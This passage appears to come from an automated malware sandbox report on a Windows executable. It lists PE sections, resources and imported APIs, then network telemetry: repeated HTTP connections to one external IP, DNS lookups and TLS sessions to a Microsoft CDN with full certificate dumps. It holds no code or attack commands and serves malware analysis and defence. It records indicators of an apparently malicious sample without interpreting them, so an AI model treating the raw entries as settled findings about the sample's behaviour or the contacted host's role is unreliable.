.data | 0x5000 | 0xd3 | 0x200 | False | 0.29296875 | data | 2.15164446496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0xa500 | 0xa600 | False | 0.916886295181 | data | 7.80697076173 | IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_DIALOG | 0x66c0 | 0x20 | data | English | United States
RT_DIALOG | 0x66e0 | 0x20 | data | English | United States
RT_DIALOG | 0x6700 | 0x20 | data | English | United States
RT_DIALOG | 0x6720 | 0x20 | data | English | United States
RT_DIALOG | 0x6740 | 0x20 | data | English | United States
RT_DIALOG | 0x6760 | 0x20 | data | English | United States
RT_DIALOG | 0x6780 | 0x20 | data | English | United States
RT_DIALOG | 0x67a0 | 0x20 | data | English | United States
RT_DIALOG | 0x67c0 | 0x20 | data | English | United States
RT_DIALOG | 0x67e0 | 0x20 | data | English | United States
RT_DIALOG | 0x6800 | 0x20 | data | English | United States
RT_DIALOG | 0x6820 | 0x20 | data | English | United States
RT_DIALOG | 0x6840 | 0x20 | data | English | United States
RT_DIALOG | 0x6860 | 0x20 | data | English | United States
RT_DIALOG | 0x6880 | 0x20 | data | English | United States
RT_DIALOG | 0x68a0 | 0x20 | data | English | United States
RT_DIALOG | 0x68c0 | 0x20 | data | English | United States
RT_DIALOG | 0x68e0 | 0x20 | data | English | United States
RT_DIALOG | 0x6900 | 0x20 | data | English | United States
RT_DIALOG | 0x6920 | 0x20 | data | English | United States
RT_DIALOG | 0x6940 | 0x20 | data | English | United States
RT_DIALOG | 0x6960 | 0x20 | data | English | United States
RT_DIALOG | 0x6980 | 0x20 | data | English | United States
RT_DIALOG | 0x69a0 | 0x20 | data | English | United States
RT_DIALOG | 0x69c0 | 0x20 | data | English | United States
RT_DIALOG | 0x69e0 | 0x20 | data | English | United States
RT_DIALOG | 0x6a00 | 0x20 | data | English | United States
RT_DIALOG | 0x6a20 | 0x20 | data | English | United States
RT_DIALOG | 0x6a40 | 0x20 | data | English | United States
RT_DIALOG | 0x6a60 | 0x20 | data | English | United States
RT_DIALOG | 0x6a80 | 0x20 | data | English | United States
RT_DIALOG | 0x6aa0 | 0x20 | data | English | United States
RT_DIALOG | 0x6ac0 | 0x20 | data | English | United States
RT_DIALOG | 0x6ae0 | 0x20 | data | English | United States
RT_DIALOG | 0x6b00 | 0x9a00 | data | English | United States

Imports

DLL | Import
kernel32.dll | CloseHandle, GetLocalTime, VirtualFree, DeleteFileA, GetPrivateProfileStringA, LoadLibraryA, CreateProcessA, HeapReAlloc, LoadLibraryExW, WaitForSingleObject, InterlockedDecrement, CopyFileA, FindNextFileA, GetProcAddress, FindResourceExW, ReadConsoleA, GetShortPathNameA, HeapCreate, IsBadWritePtr, GetFileAttributesA
dsprop.dll | FindSheet, CrackName, CheckADsError, ErrMsg
wtsapi32.dll | WTSSendMessageW, WTSEnumerateServersW, WTSFreeMemory, WTSVirtualChannelOpen, WTSVirtualChannelClose, WTSSetUserConfigW, WTSUnRegisterSessionNotification, WTSTerminateProcess, WTSWaitSystemEvent, WTSVirtualChannelRead
shlwapi.dll | UrlIsNoHistoryW, UrlCreateFromPathW, UrlUnescapeA, PathCompactPathW, PathCommonPrefixW, UrlGetLocationW, UrlIsA, UrlCanonicalizeW, UrlUnescapeA, UrlHashW, PathIsRootW, UrlCompareW
crypt32.dll | CertDeleteCRLFromStore, CertDuplicateCRLContext, CertFindAttribute, CertFindCRLInStore, CertFindRDNAttr, CertNameToStrW, CertFreeCertificateChain, CertCloseStore, CertCompareCertificate, CryptFindOIDInfo

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 13, 2018 14:03:00.768953085 MESZ | 49164 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:00.769715071 MESZ | 49165 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:01.850606918 MESZ | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.864563942 MESZ | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.874231100 MESZ | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.880124092 MESZ | 59605 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.887587070 MESZ | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.893393993 MESZ | 53 | 59605 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.927644014 MESZ | 50900 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.938977003 MESZ | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.940829039 MESZ | 53 | 50900 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.942336082 MESZ | 61674 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.952680111 MESZ | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.956074953 MESZ | 53 | 61674 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:03.771714926 MESZ | 49164 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:03.771804094 MESZ | 49165 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:05.052207947 MESZ | 59291 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:05.065459013 MESZ | 53 | 59291 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:09.808270931 MESZ | 49164 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:09.808336973 MESZ | 49165 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:21.811774015 MESZ | 49168 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:21.826903105 MESZ | 49169 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:24.812908888 MESZ | 49168 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:24.833173990 MESZ | 49169 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:27.330975056 MESZ | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:27.370923996 MESZ | 53 | 63053 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:27.372629881 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.373440027 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.390280008 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.390419960 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.391093969 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.391210079 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.403280973 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.404558897 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.421076059 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.421648026 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.421685934 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.421705961 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.421722889 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.421850920 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.422137976 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422454119 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422491074 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422512054 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422535896 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422549009 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.422558069 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422703028 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422796965 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.422812939 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.422841072 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.423439026 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.423531055 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.423602104 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.423612118 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.423629999 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.423713923 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.447113991 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.465198040 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.465311050 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.469621897 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.487481117 MESZ | 443 | 49171 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.487561941 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.566498041 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:27.588301897 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.588332891 MESZ | 443 | 49170 | 152.199.19.161 | 192.168.2.2
Aug 13, 2018 14:03:27.588417053 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:03:30.812406063 MESZ | 49168 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:03:30.832439899 MESZ | 49169 | 80 | 192.168.2.2 | 195.123.212.153
Aug 13, 2018 14:04:15.147206068 MESZ | 49171 | 443 | 192.168.2.2 | 152.199.19.161
Aug 13, 2018 14:04:15.148457050 MESZ | 49170 | 443 | 192.168.2.2 | 152.199.19.161

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 13, 2018 14:03:01.850606918 MESZ | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.864563942 MESZ | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.874231100 MESZ | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.880124092 MESZ | 59605 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.887587070 MESZ | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.893393993 MESZ | 53 | 59605 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.927644014 MESZ | 50900 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.938977003 MESZ | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.940829039 MESZ | 53 | 50900 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.942336082 MESZ | 61674 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:01.952680111 MESZ | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:01.956074953 MESZ | 53 | 61674 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:05.052207947 MESZ | 59291 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:05.065459013 MESZ | 53 | 59291 | 8.8.8.8 | 192.168.2.2
Aug 13, 2018 14:03:27.330975056 MESZ | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Aug 13, 2018 14:03:27.370923996 MESZ | 53 | 63053 | 8.8.8.8 | 192.168.2.2

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 13, 2018 14:03:27.370923996 MESZ | 8.8.8.8 | 192.168.2.2 | 0x611a | No error (0) | ie9comview.vo.msecnd.net | cs9.wpc.v0cdn.net | | CNAME (Canonical name) | IN (0x0001)
Aug 13, 2018 14:03:27.370923996 MESZ | 8.8.8.8 | 192.168.2.2 | 0x611a | No error (0) | cs9.wpc.v0cdn.net | | 152.199.19.161 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Raw
Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=*.vo.msecnd.netCN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USFri Mar 30 19:48:56 CEST 2018Mon Mar 30 19:48:56 CEST 2020[[ Version: V3 Subject: CN=*.vo.msecnd.net Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 26650803979259295716290423693905296698157083325048498445836080201188299707993523769983022596768079645285384865155132965572416436152378172025499450880633264224755571468835296223137555283971797334879051618498098440929892959115038801729724039469239084562396320177233195067487817337082459981077208444076525818793397580249136338078721428618161201050325403922256394870562406690344296180719053188791769325712246232155686598548851946583469494216117938492274511053022075022710177237525565910648338744931738281978430913279296706457579042005546769662912351613258485613692711958886470421185755835262239469076692855817140222781347 public exponent: 65537 Validity: [From: Fri Mar 30 19:48:56 CEST 2018, To: Mon Mar 30 19:48:56 CEST 2020] Issuer: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US SerialNumber: [ 20000270 cc6d2533 6ca081b3 59000000 0270cc]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.311.21.10 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 1A 30 18 30 0A 06 08 2B 06 01 05 05 07 03 02 ..0.0...+.......0010: 30 0A 06 08 2B 06 01 05 05 07 03 01 0...+.......[2]: ObjectId: 1.3.6.1.4.1.311.21.7 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 31 30 2F 06 27 2B 06 01 04 01 82 37 15 08 87 .10/.'+.....7...0010: DA 86 75 83 EE D9 01 82 C9 85 1B 81 B5 9E 61 85 ..u...........a.0020: F4 EB 60 81 5D 84 D2 DF 42 82 E7 93 7A 02 01 64 ..`.]...B...z..d0030: 02 01 1D ...[3]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: 
http://www.microsoft.com/pki/mscorp/Microsoft%20IT%20TLS%20CA%202.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.msocsp.com]][4]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://mscrl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl, URIName: http://crl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.311.42.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 27 68 74 74 70 3A 2F 2F 77 77 77 2E 6D 69 63 .'http://www.mic0010: 72 6F 73 6F 66 74 2E 63 6F 6D 2F 70 6B 69 2F 6D rosoft.com/pki/m0020: 73 63 6F 72 70 2F 63 70 73 scorp/cps]] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ clientAuth serverAuth][8]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment Data_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.vo.msecnd.net DNSName: *.adn.azureedge.net DNSName: *.ads2.msads.net DNSName: *.aspnetcdn.com DNSName: *.azurecomcdn.net DNSName: *.azureedge.net DNSName: *.azureedge-test.net DNSName: *.cdn.skype.com DNSName: *.cdn.skype.net DNSName: *.cmsresources.windowsphone.com DNSName: *.cmsresources.windowsphone-int.com DNSName: *.dev.skype.com DNSName: *.fms.azureedge.net DNSName: *.microsoft-sbs-domains.com DNSName: *.secure.skypeassets.com DNSName: *.secure.skypeassets.net DNSName: *.wac.azureedge.net DNSName: *.wpc.azureedge.net DNSName: *.ec.azureedge.net DNSName: *.wpc.ec.azureedge.net DNSName: *.wac.ec.azureedge.net DNSName: *.adn.ec.azureedge.net DNSName: *.fms.ec.azureedge.net DNSName: ajax.microsoft.com DNSName: cdnads.msads.net DNSName: cdn-resources.windowsphone.com DNSName: 
cdn-resources-beta.windowsphone.com DNSName: ecnads1.msn.com DNSName: iecvlist.microsoft.com DNSName: images-cms-pn.windowsphone-int.com DNSName: images-cms-tst.windowsphone-int.com DNSName: lumiahelptipscdn.microsoft.com DNSName: lumiahelptipscdnqa.microsoft.com DNSName: lumiahelptipsmscdn.microsoft.com DNSName: lumiahelptipsmscdnqa.microsoft.com DNSName: montage.msn.com DNSName: mscrl.microsoft.com DNSName: r20swj13mr.microsoft.com DNSName: *.streaming.mediaservices.windows.net DNSName: *.origin.mediaservices.windows.net DNSName: download.sysinternals.com DNSName: amp.azure.net DNSName: rt.ms-studiosmedia.com DNSName: gtm.ms-studiosmedia.com DNSName: *.aisvc.visualstudio.com DNSName: *.cdn.powerbi.com DNSName: dist.asp.net DNSName: embed.powerbi.com DNSName: msitembed.powerbi.com DNSName: dxtembed.powerbi.com DNSName: *.cdn.powerappscdn.net DNSName: downloads.subscriptionsint.tfsallin.net DNSName: download.my.visualstudio.com DNSName: cdn.vsassets.io DNSName: cdnppe.vsassets.io DNSName: stream.microsoft.com DNSName: datafactory.azure.com DNSName: *.cortanaanalytics.com DNSName: do.skype.com DNSName: software-download.office.microsoft.com DNSName: software-download.microsoft.com DNSName: prss.centralvalidation.com DNSName: *.gallerycdn.vsassets.io DNSName: *.gallerycdnppe.vsassets.io DNSName: global.asazure.windows.net DNSName: download.learningdownloadcenter.microsoft.com DNSName: www.videobreakdown.com DNSName: www.breakdown.me DNSName: *.gallerycdntest.vsassets.io DNSName: agavecdn.o365weve-dev.com DNSName: agavecdn.o365weve-ppe.com DNSName: agavecdn.o365weve.com DNSName: download.visualstudio.com DNSName: *.Applicationinsights.net DNSName: *.Applicationinsights.io DNSName: *.Applicationinsights.microsoft.com DNSName: *.sfbassets.com DNSName: *.sfbassets.net DNSName: download.mono-project.com DNSName: *.streaming.media-test.windows-int.net DNSName: *.origin.mediaservices.windows-int.net DNSName: *.mp.microsoft.com DNSName: download.visualstudio.microsoft.com 
DNSName: software-download.coem.microsoft.com DNSName: cdn.wallet.microsoft-ppe.com DNSName: cdn.wallet.microsoft.com DNSName: vi.microsoft.com DNSName: *.nuget.org DNSName: *.nugettest.org DNSName: cdn.botframework.com DNSName: *.streaming.media.azure.net DNSName: *.streaming.media.azure-test.net DNSName: natick.research.microsoft.com DNSName: quotecenter.microsoft.com DNSName: quotecenter-ppe.microsoft.com DNSName: cdn.cloudappsecurity.com DNSName: *.yammer.com DNSName: *.videoindexer.ai DNSName: *.api.videoindexer.ai][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: CD 01 B0 7E 67 61 98 56 52 16 A4 D7 17 C9 AD AE ....ga.VR.......0010: 2A BC B0 76 *..v]]] Algorithm: [SHA256withRSA] Signature:0000: 3F 55 65 AB A9 07 00 4E 0C CB 83 3F 4B 18 6D 39 ?Ue....N...?K.m90010: 16 43 19 BD 48 3B BB CC 9A 13 AD 73 42 8B BA 09 .C..H;.....sB...0020: 72 2E 49 86 78 02 64 85 67 44 39 C7 36 A9 87 15 r.I.x.d.gD9.6...0030: E0 83 E8 AA D0 CA 2C 47 E3 C9 77 D4 08 C2 1E B6 ......,G..w.....0040: 92 AA 54 0B 2B CD 55 A2 C9 29 89 71 11 70 E2 D0 ..T.+.U..).q.p..0050: 52 1F EF 8A 70 83 7A 90 80 35 5F B6 91 D0 CA 18 R...p.z..5_.....0060: E5 04 AC 0B 70 B1 25 4A 7E 4D FA 76 63 FC 45 B8 ....p.%J.M.vc.E.0070: 13 BF 84 C0 A1 CC C9 A9 29 37 8E 70 56 62 05 71 ........)7.pVb.q0080: 18 78 94 DB 1B 10 5B 0E A3 6C 15 F2 B5 BD 49 A1 .x....[..l....I.0090: D9 05 64 42 19 F9 B0 B6 D9 7B 7E E9 04 1D 73 9F ..dB..........s.00A0: 32 08 DD D2 85 C8 70 05 A6 13 3F D0 32 F1 10 6A 2.....p...?.2..j00B0: A7 DF 48 7F C4 24 DB 8D 9A 36 4D 8B 5B 7E 9B FB ..H..$...6M.[...00C0: EA F1 CA E6 40 4C 65 48 11 BF 13 1B D8 BF 00 4B ....@LeH.......K00D0: ED BE BF 27 9F 19 48 26 79 73 92 69 68 48 D1 9F ...'..H&ys.ihH..00E0: FC 51 70 9D 1F A0 7E 1C 5A 87 D3 8C 4E 70 62 E0 .Qp.....Z...Npb.00F0: 56 2A 83 29 BE F6 59 92 57 4F 3D DC 71 8E 0A D4 V*.)..Y.WO=.q...0100: 08 FC EE C6 94 9A 5E 31 7C 27 5F 1E 6D 90 66 0A ......^1.'_.m.f.0110: 3E C3 90 20 48 3C 04 DF B6 2F 3E 70 C6 4A 60 E5 >.. 
H<.../>p.J`.0120: 20 B1 9B DF 48 2B 88 E5 33 76 FA 0E B5 5A 2D 2F ...H+..3v...Z-/0130: 71 47 05 80 C6 57 A0 14 B6 A5 35 56 9B B6 A6 20 qG...W....5V... 0140: 00 6C 70 4F 2F B6 AD BD F3 EA 5B 60 F5 14 ED 6B .lpO/.....[`...k0150: 6B 44 15 CE 91 2D 7F 36 11 3E 39 EB CC C3 DF A9 kD...-.6.>9.....0160: FB A8 9D 7F 64 94 A5 87 E0 7F 2F 0F 91 56 4E F5 ....d...../..VN.0170: F5 49 9F 9F 8E 6E 13 B4 94 7E 24 A6 B2 E1 F3 DA .I...n....$.....0180: 3E DE EC 5E FB 64 29 DC 57 F3 46 73 07 03 A2 69 >..^.d).W.Fs...i0190: 69 7A 01 0F 2C 72 11 8C 8E 41 DF 6B 93 09 B2 F0 iz..,r...A.k....01A0: DF B1 82 40 2E 1B FD 1C 22 DE EB 6C 2B 89 33 BE ...@...."..l+.3.01B0: 6C 14 2F FC ED 2E 3E B8 D7 B8 45 44 DE AC 64 FA l./...>...ED..d.01C0: 15 8E 95 BB 4E 04 04 75 3D 13 A2 1D 94 7A B8 8E ....N..u=....z..01D0: 24 6D CD 66 E7 40 7E E5 C3 4F BC 22 8A D7 78 A1 $m.f.@...O."..x.01E0: 7C 0A 95 87 55 CC CF 8F 41 57 91 98 E7 AA E7 DE ....U...AW......01F0: C5 C2 0C D1 A1 03 76 BC 82 C6 C9 9E 3F 98 43 7D ......v.....?.C.]
Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 20 14:51:57 CEST 2016Mon May 20 14:51:57 CEST 2024[[ Version: V3 Subject: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 4096 bits modulus: 647294255602325793990002513119693468857392867898417605410250896666240868552526284895128080800072075079541116694006108111424285769210952443117016108817512004416915652231910726180601295496484283455657703546650167672472095813058953881613183359786366741204887237778758654131517015592572803423794117451702755161544979434031590265341003857135228312611468237470025540692665622782242245418396439043641638694688252969318505934528611852331845685201979673767756215622457277048995475799862983198559683031746002361975577371668527079660623700395748659568646041541973621714023268935223403435124814495591465766470454743043858485541464708934243998176475016309920664622704013423283337532488437325584305269612425692156906642521785806736108836293408234401329760217850656597482737516435684644509149184860637949964770877674659801402449999763931813660784340254013505819744099600848977200865054274097501530563387171488283923635556233850167978272146006159159364253066097677840315992598562396543614479225118965642333219965644634595301995940368770892345795950122637528531630935913800079064090039488940652767821851441910089798494405128972383400235177579883092457976791664618121612668703609711139468476583630291006864328822405235915054059848188166737876217120001 public exponent: 65537 Validity: [From: Fri May 20 14:51:57 CEST 2016, To: Mon May 20 14:51:57 CEST 2024] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 0f2c10c9 5b06c093 7fb8d449 f83e8569]Certificate 
Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/Omniroot2025.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth OCSPSigning][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]]] Algorithm: [SHA256withRSA] Signature:0000: 6C 7F EA 6A 6F CF 6B 5B C1 34 AC FF DC 0E E0 7D l..jo.k[.4......0010: 8B 13 17 E0 2F 4E 59 0E C4 03 B9 F4 05 29 65 47 ..../NY......)eG0020: AE 19 9A E8 54 F6 64 D5 D8 BD 06 E0 71 22 19 7B ....T.d.....q"..0030: CE 9A DD 79 8B DF 70 27 48 68 DB F7 6F 33 19 B5 ...y..p'Hh..o3..0040: 65 EB 9F 90 07 CC B8 47 39 7D 0F 51 13 91 0D 80 e......G9..Q....0050: D4 76 50 2B 85 07 60 6D 6D 59 9A 29 40 16 C6 C7 .vP+..`mmY.)@...0060: 0D E0 6A 57 4B 80 09 BF EF C7 4B 45 57 B3 94 AE ..jWK.....KEW...0070: D7 D2 74 0C 0F 01 83 E9 68 F1 E9 02 97 87 6A D8 ..t.....h.....j.0080: 6D 66 D5 6B 02 BC 50 48 A0 B2 23 77 89 DE 08 B9 mf.k..PH..#w....0090: 46 A3 14 F6 8C 0E 37 96 3D 89 A5 0F D2 32 42 E4 F.....7.=....2B.00A0: 2F 2F 43 5E 3F C9 1D DB 2A 24 34 79 A2 07 
22 8F //C^?...*$4y..".00B0: 85 48 5F C5 7E 6D 50 F4 34 2C 3B 91 06 BA 52 5A .H_..mP.4,;...RZ00C0: BD 66 8D 23 0C 4A B5 6A DE 33 49 E1 F8 99 5D 8F .f.#.J.j.3I...].00D0: 30 CD CB C0 85 C1 03 6C 68 E6 C7 5A D5 C9 D4 58 0......lh..Z...X00E0: 9A 37 3E AE 2E 32 07 0B 7B 4B 7E 7C 2B AD DF C3 .7>..2...K..+...00F0: 4C 91 39 7C 17 46 AB 7E 5B 29 6A A5 15 55 4A 2F L.9..F..[)j..UJ/]
